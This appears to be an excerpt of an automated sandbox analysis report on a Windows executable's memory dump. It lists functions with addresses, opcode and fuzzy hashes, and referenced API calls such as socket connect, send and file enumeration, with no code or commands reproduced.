Instruction ID: 0d3b723b48711c09e90fb06ab1dd2316f1d6a9dd39ece952454796c1e9e4c761
Opcode Fuzzy Hash: 5c67969e0850813bcbd20a94ffb59b4834a1594f9cdca26fa019d3763ce1f86b
Instruction Fuzzy Hash: 3341E672A00119ABCB15EF6CCC816AEB7F5EF85300B1906AAE915E7341D730DD5187E1

Function 00DD3400 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD3517

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 7a71a6aa1936c4af0662bae26868a9ee1ee95d6e5a6c1aa0aa59f8c388eb1193
Instruction ID: d1ebdaf83b897d2a8348d16615e8ba8126292bbd27f5996cbed0b9f5d6dbdb77
Opcode Fuzzy Hash: 7a71a6aa1936c4af0662bae26868a9ee1ee95d6e5a6c1aa0aa59f8c388eb1193
Instruction Fuzzy Hash: F5310673E051145BCB19EE6C988156EB3E9EF84361719027BE816EB341EA30DE5187B2

Function 00DF1030 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DF116A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: f107be0cf85cd098fc2fb678e57460bf8139b04dbfdfcebca54bffe8f7f06728
Instruction ID: 59673c8be37e170bd46c40c4adef1f4bb117bd052e0832f950538cd0d17e8f4e
Opcode Fuzzy Hash: f107be0cf85cd098fc2fb678e57460bf8139b04dbfdfcebca54bffe8f7f06728
Instruction Fuzzy Hash: E641F476A00108DFC718DE7CC88597EB7E9EF85350B29C269E915DB385EA30DD418771

Function 00DD3AE0 Relevance: 1.6, APIs: 1, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD3C33

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4ae21a175c1fa3040efe62623f72fe7860e08d29538b5fe9f8562e4c911e5fac
Instruction ID: dafad0a065c4f46bfa1880fc750b934a2da99962210dc485dd5a1f21d09a0493
Opcode Fuzzy Hash: 4ae21a175c1fa3040efe62623f72fe7860e08d29538b5fe9f8562e4c911e5fac
Instruction Fuzzy Hash: 3E31C772E001199BCB19DF6CD8419AEB7E5EF84310B1945AAE819FB301D630DE5187B2

Function 00DEE1D0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DEE2D9

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: a9303b97d8e8882557a8132d26d6d27e0bb817dca8fc6d788620c7b02ace02fb
Instruction ID: d7fe8b0419e3fdc7baba9a8aff6390e577d5a7ea1e19323ef9f4800e19d24279
Opcode Fuzzy Hash: a9303b97d8e8882557a8132d26d6d27e0bb817dca8fc6d788620c7b02ace02fb
Instruction Fuzzy Hash: C831F732A001009FD718EF78CD85A6EB7E9DB84310B188369E915DB389DA30ED4187B5

Function 00DD2330 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD2381

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 925b202c4164dfc354f164a1d9335b19374ff3363309776341cf9a0ff2a02a63
Instruction ID: 694f48b2a2f40b2c872e74b7ce8cffe08cf18fa43d5b2652033fc6533b50e15d
Opcode Fuzzy Hash: 925b202c4164dfc354f164a1d9335b19374ff3363309776341cf9a0ff2a02a63
Instruction Fuzzy Hash: 8E01DB3151010907EB1CEA68C856A7DB395DB50351B14873EF9298B782D624ED908675

Function 00DFEF02 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dda9ea535bd1c87bbba1092cf56f7949badbf556995430fcd324725e0e94bb
Instruction ID: 7d0826a43e6172458fe60466df4011b2609db8f368bea26726c187954efd85f8
Opcode Fuzzy Hash: 41dda9ea535bd1c87bbba1092cf56f7949badbf556995430fcd324725e0e94bb
Instruction Fuzzy Hash: B801F53371411D6FAB11CE6AEC4196A37A6AFC136072AC521FA01EB1A5DA31C80287A0

Function 00E17568 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00E175A2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 301939369e056625e336a53666678b2c6cef92a5e48dfce3a5545996e96895dc
Instruction ID: 4fa9b6cb88f1eef364a637f542a90df77ae59c2a7c81509d9a116fb44c5a2fcd
Opcode Fuzzy Hash: 301939369e056625e336a53666678b2c6cef92a5e48dfce3a5545996e96895dc
Instruction Fuzzy Hash: 951145B1A0420AAFCB05DF58E9419DE7BF9EF48304F014069F809EB211D630EA11CB64

Function 00E0F894 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00DC645E

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 91a640da19c7a63dafcf1d9849d9d01e11733087fc886bab0069c99f402b4053
Instruction ID: 7472edb7a516a10a9338359939515aecec106729bad53babc95a09abdf8725c4
Opcode Fuzzy Hash: 91a640da19c7a63dafcf1d9849d9d01e11733087fc886bab0069c99f402b4053
Instruction Fuzzy Hash: 2E01F77140430D67C728AEE4EC069C977AC9E01364B149535F914BA490FB70E9D082A0

Function 00DDFC00 Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00000000), ref: 00DDFC38

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 75966dfb669c6004fd3a355feefe01bcbe8dd0997f68e4a1ed3d3a0278e30821
Instruction ID: 46ee3647dabe943953dc70b630e018f322872977f761184d6793e01ca19150b0
Opcode Fuzzy Hash: 75966dfb669c6004fd3a355feefe01bcbe8dd0997f68e4a1ed3d3a0278e30821
Instruction Fuzzy Hash: 59F09032311118AB83248A6EAC80A66F7DEDBC56707240377EC29D33E0E9619C1142A4

Function 00DD3F50 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD3FA0

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 67afa24f52013d5c2665d29d8327c3d43e7e9dcaf67f6319bd7695040772be0c
Instruction ID: acf7450a9db30f8c01a9ca88f0c9abe9097ad5f88ff49bdc54f190af650fd035
Opcode Fuzzy Hash: 67afa24f52013d5c2665d29d8327c3d43e7e9dcaf67f6319bd7695040772be0c
Instruction Fuzzy Hash: 35F027B2D0420D0AE71CE770AC06A6F73E88E60360718853AF519C6782F631EAA0C136

Function 00E0148B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00E10FDF,?,?,?,?,?,00DC6357,?,?,?), ref: 00E014BD

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 92e525aa48bbcc6d122bda455433cdaadf9dee7e209094106c8a4c717ea5d90c
Instruction ID: f62112da25f8d87afebb3467d8f42c088b869e02a15a183d66d07f18d2588571
Opcode Fuzzy Hash: 92e525aa48bbcc6d122bda455433cdaadf9dee7e209094106c8a4c717ea5d90c
Instruction Fuzzy Hash: 18E0E5311002296AE6202666CC04B9A768CAF413F8F1971A0AC69FE4F2CA60CCC082F1

Function 00DDDB90 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DDF190: WSAStartup.WS2_32(00000202,00E36B1C), ref: 00DDF285
Part of subcall function 00DDF190: socket.WS2_32(00000002,00000001,00000000), ref: 00DDF294
Part of subcall function 00DDF190: htons.WS2_32(00000002), ref: 00DDF2B7
Part of subcall function 00DDF190: inet_pton.WS2_32(00000002,00E389A0,00E36CB0), ref: 00DDF2DE
Part of subcall function 00DDF190: connect.WS2_32(00E36CAC,00000010), ref: 00DDF2F1
Part of subcall function 00DDF190: closesocket.WS2_32 ref: 00DDF302

ExitProcess.KERNEL32 ref: 00DDDBC0

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ExitProcessStartupclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2261068128-0
Opcode ID: 9c210288356e2bc5366e6dc5f468e73902c9c00ed0a68351dc23c53f5477ef30
Instruction ID: ab8ee034ab3dc4a3ec63d4518d5bdcc89a94f844ab27a0bb30139200ab3d93a4
Opcode Fuzzy Hash: 9c210288356e2bc5366e6dc5f468e73902c9c00ed0a68351dc23c53f5477ef30
Instruction Fuzzy Hash: 5EF08272A44648ABDB10DF65DC46F5AB7A8E745B10F04493AB916E7781DA39940086A0

Function 00E0AC1F Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E0AC26

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 18c70d9647781ce4d02d3b93286af52ebce5e9a714d88aa9422bdd8821b29868
Instruction ID: 40d17f42fa0984b41520cb866f0f09ca5144997dc3a30198a20a29b5d1cf000d
Opcode Fuzzy Hash: 18c70d9647781ce4d02d3b93286af52ebce5e9a714d88aa9422bdd8821b29868
Instruction Fuzzy Hash: E4E09AB2D4020E9ADB00DFD4C452BEFB7FCAB44300F505026A605F6181EA7457848BA2

Function 00E18B7B Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00E18EDD,?,?,00000000,?,00E18EDD,00000000,0000000C), ref: 00E18B98

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d296771fb16f90a517b0a9a79848ecb3e0e5cebc328f1440f98f5a258653cd4b
Instruction ID: 5dfd5163706718caad9805cded2ee25e64a6776f85dba457530006296876d181
Opcode Fuzzy Hash: d296771fb16f90a517b0a9a79848ecb3e0e5cebc328f1440f98f5a258653cd4b
Instruction Fuzzy Hash: FAD06C3200010DBFEF128F85DC06EDA3BAAFB4C714F018000BA1866061C732E832AB90

Non-executed Functions

Function 00E14A34 Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(000000FF,00000000,?,00000180,?), ref: 00E14ACC
GetLastError.KERNEL32 ref: 00E14AD6
FindFirstFileW.KERNEL32(000000FF,?), ref: 00E14AED
GetLastError.KERNEL32 ref: 00E14AF8
FindClose.KERNEL32(00000000), ref: 00E14B04
___std_fs_open_handle@16.LIBCPMT ref: 00E14BBD

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID:
API String ID: 2340820627-0
Opcode ID: 791b215288220ee073a42c66cc899ffdf1f96190c05f9c95e56f61b722c3236e
Instruction ID: a3a296127d1631108a7643ecc5207db5b75b9cdb558a041d6781fd844a9fafd3
Opcode Fuzzy Hash: 791b215288220ee073a42c66cc899ffdf1f96190c05f9c95e56f61b722c3236e
Instruction Fuzzy Hash: A071AEB4A0161A9FDB24CF29DC88BEAB7B8AF05314F145255E855F33D0EB309E85CB90

Function 00E09964 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00E09A70
IsValidCodePage.KERNEL32(00000000), ref: 00E09AB9
IsValidLocale.KERNEL32(?,00000001), ref: 00E09AC8
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00E09B10
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00E09B2F

Strings

/, xrefs: 00E09A1D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: /
API String ID: 415426439-3878498614
Opcode ID: 59924229cff756bcaac3aea0557b46e225220dbd5e7f79058a8cab0e4e692c18
Instruction ID: ebf27db1bbec83749b1e1c36e97aa06f3035f6381fc4ea88fff77379f3c7d676
Opcode Fuzzy Hash: 59924229cff756bcaac3aea0557b46e225220dbd5e7f79058a8cab0e4e692c18
Instruction Fuzzy Hash: 49514B72A0020AAFDB21DFA5DC81AAE77B8AF48704F155529E911FB1D3E77099848B60

Function 00DD5310 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DD548A
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DD54CE
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DD55DD
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DD562E

Strings

., xrefs: 00DD5600

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 2192600ac3fecb56095841723adf44202569ce37ed111dec044619aac2610093
Instruction ID: 9ecfac0381b583086a19768add7fefb39598cab9e74aca7a71aaf4bbafa69fe3
Opcode Fuzzy Hash: 2192600ac3fecb56095841723adf44202569ce37ed111dec044619aac2610093
Instruction Fuzzy Hash: E8E12671901A16DFCB20CF18D884BAAB7F5FF44314F5842AAE8059B794DB71ED84CBA1

Function 00E09000 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

GetACP.KERNEL32(?,?,?,?,?,?,00DFDCD6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00E090C1
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00DFDCD6,?,?,?,00000055,?,-00000050,?,?), ref: 00E090EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00E0924F

Strings

/, xrefs: 00E09077
utf8, xrefs: 00E091BE

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8$/
API String ID: 607553120-3349841379
Opcode ID: ee3a1f909d26b89c3ec5200ff59d32854bff8950deb2a23846067a201775bc21
Instruction ID: 8ddcb870765af5e8cd8af0d58f80aaf4f6d4ff7b9af311f8692391dbecac6dad
Opcode Fuzzy Hash: ee3a1f909d26b89c3ec5200ff59d32854bff8950deb2a23846067a201775bc21
Instruction Fuzzy Hash: D271D471601306AAEB24AF75CC46BBA73E8EF44704F15642AF645FB1C3EA71D9C0C6A0

Function 00E0978F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00E09AAD,00000002,00000000,?,?,?,00E09AAD,?,00000000), ref: 00E09828
GetLocaleInfoW.KERNEL32(00000000,20001004,00E09AAD,00000002,00000000,?,?,?,00E09AAD,?,00000000), ref: 00E09851
GetACP.KERNEL32(?,?,00E09AAD,?,00000000), ref: 00E09866

Strings

OCP, xrefs: 00E097E3
ACP, xrefs: 00E097AD

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f383ea9c01cbbe5a3830fef34c0a5444ae1578045cd0e3ee34adffe6f1696bec
Instruction ID: 59f0034b86d3d3d2065152039c8abfd70c0432b4072e5f3d6474035fd84ea485
Opcode Fuzzy Hash: f383ea9c01cbbe5a3830fef34c0a5444ae1578045cd0e3ee34adffe6f1696bec
Instruction Fuzzy Hash: 0421FB32A011019ADB388F65D901A9773A6EF55F58B16D425E546F7387E731DDC0C360

Function 00E018B0 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E0193D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f7eb5e89479653599841870f2cc3a257071628d270d4206b49d9c8c0caa12c71
Instruction ID: 354a4a66f340d94a253c620012883bb839d6a964c6db46aa6d7223372538f6cd
Opcode Fuzzy Hash: f7eb5e89479653599841870f2cc3a257071628d270d4206b49d9c8c0caa12c71
Instruction Fuzzy Hash: 53B14632A052459FDB158F68C891BEEBBF5EF45314F1491EAE845BF282E3349D81CB60

Function 00DF867D Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00DF86A6
